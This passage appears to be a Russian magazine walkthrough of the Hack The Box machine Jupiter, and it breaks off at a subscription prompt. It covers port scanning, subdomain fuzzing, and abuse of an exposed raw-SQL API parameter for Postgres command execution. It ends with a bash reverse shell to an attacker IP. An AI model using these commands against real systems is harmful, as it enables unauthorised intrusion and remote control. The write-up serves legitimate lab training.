Содержание статьи
Наша цель — захват прав суперпользователя на тренировочной машине Jupiter с площадки Hack The Box. Уровень ее сложности — средний.
warning
Подключаться к машинам с HTB рекомендуется только через VPN. Не делай этого с компьютеров, где есть важные для тебя данные, так как ты окажешься в общей сети с другими участниками.
Разведка
Сканирование портов
Добавляем IP-адрес машины в
/:
10.10.11.216 jupiter.htb
И запускаем сканирование портов.
Справка: сканирование портов
Сканирование портов — стандартный первый шаг при любой атаке. Он позволяет атакующему узнать, какие службы на хосте принимают соединение. На основе этой информации выбирается следующий шаг к получению точки входа.
Наиболее известный инструмент для сканирования — это Nmap. Улучшить результаты его работы ты можешь при помощи следующего скрипта:
#!/bin/bashports=$(nmap -p- --min-rate=500 $1 | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//)nmap -p$ports -A $1
Он действует в два этапа. На первом производится обычное быстрое сканирование, на втором — более тщательное сканирование, с использованием имеющихся скриптов (опция
-A).
Сканер нашел два открытых порта:
- порт 22 — служба OpenSSH 8.9p1;
- порт 80 — веб‑сервер Nginx 1.18.0.
При таком выборе начинать нужно с изучения сайта.
Точка входа
На самом сайте ничего интересного не находим, поэтому попробуем поискать поддомены.
Справка: сканирование веба c ffuf
Одно из первых действий при тестировании безопасности веб‑приложения — это сканирование методом перебора каталогов, чтобы найти скрытую информацию и недоступные обычным посетителям функции. Для этого можно использовать программы вроде dirsearch и DIRB.
Я предпочитаю легкий и очень быстрый ffuf. При запуске указываем следующие параметры:
-
-w— словарь (я использую словари из набора SecLists);
-
-t— количество потоков;
-
-u— URL;
-
-H— HTTP-заголовок.
Место перебора помечается словом FUZZ.
Запускаем сканирование, перечислив все нужные параметры:
ffuf -u http://jupiter.htb -w subdomains-top1million-110000.txt -t 256 -H 'Host: FUZZ.jupiter.htb'
В вывод попадают абсолютно все варианты из списка, а значит, будем использовать фильтр
-fs, чтобы убрать из вывода страницы размером 178 байт.
ffuf -u http://jupiter.htb -w subdomains-top1million-110000.txt -t 256 -H 'Host: FUZZ.jupiter.htb' -fs 178
Находим новый поддомен
kiosk, который добавляем в файл
/. Обновив файл, просматриваем сайт.
10.10.11.216 jupiter.htb kiosk.jupiter.htb
Все действия я произвожу через Burp, поэтому, проверив Burp History, сразу обратил внимание на то, что используется API и в параметре
rawSql передается следующий SQL-запрос:
select count(parent) from moons where parent = 'Saturn';
Это явная точка входа, попробуем воспользоваться ей.
Точка опоры
С точки зрения пентестера, Postgres хорош тем, что может дать выполнение команд в контексте пользователя‑службы. Механизм простой: создаем таблицу и заполняем ее выводом выполненной команды. С помощью Burp Repeater отправляем SQL-запрос для создания таблицы.
create table cmd_exec(cmd_output text);
Никаких ошибок нам не вернули, поэтому запускаем локальный веб‑сервер на основе Python и выполняем на него тестовый запрос с удаленного сервера при помощи curl.
copy cmd_exec from program 'curl http://10.10.14.188/test_rce';
Получается, у нас есть RCE, поэтому запускаем листенер (
pwncat-cs ) и пробрасываем самый обычный реверс‑шелл:
bash -i >& /dev/tcp/10.10.14.188/4321 0>&1
Присоединяйся к сообществу «Xakep.ru»!
Членство в сообществе в течение указанного срока откроет тебе доступ ко ВСЕМ материалам «Хакера», позволит скачивать выпуски в PDF, отключит рекламу на сайте и увеличит личную накопительную скидку! Подробнее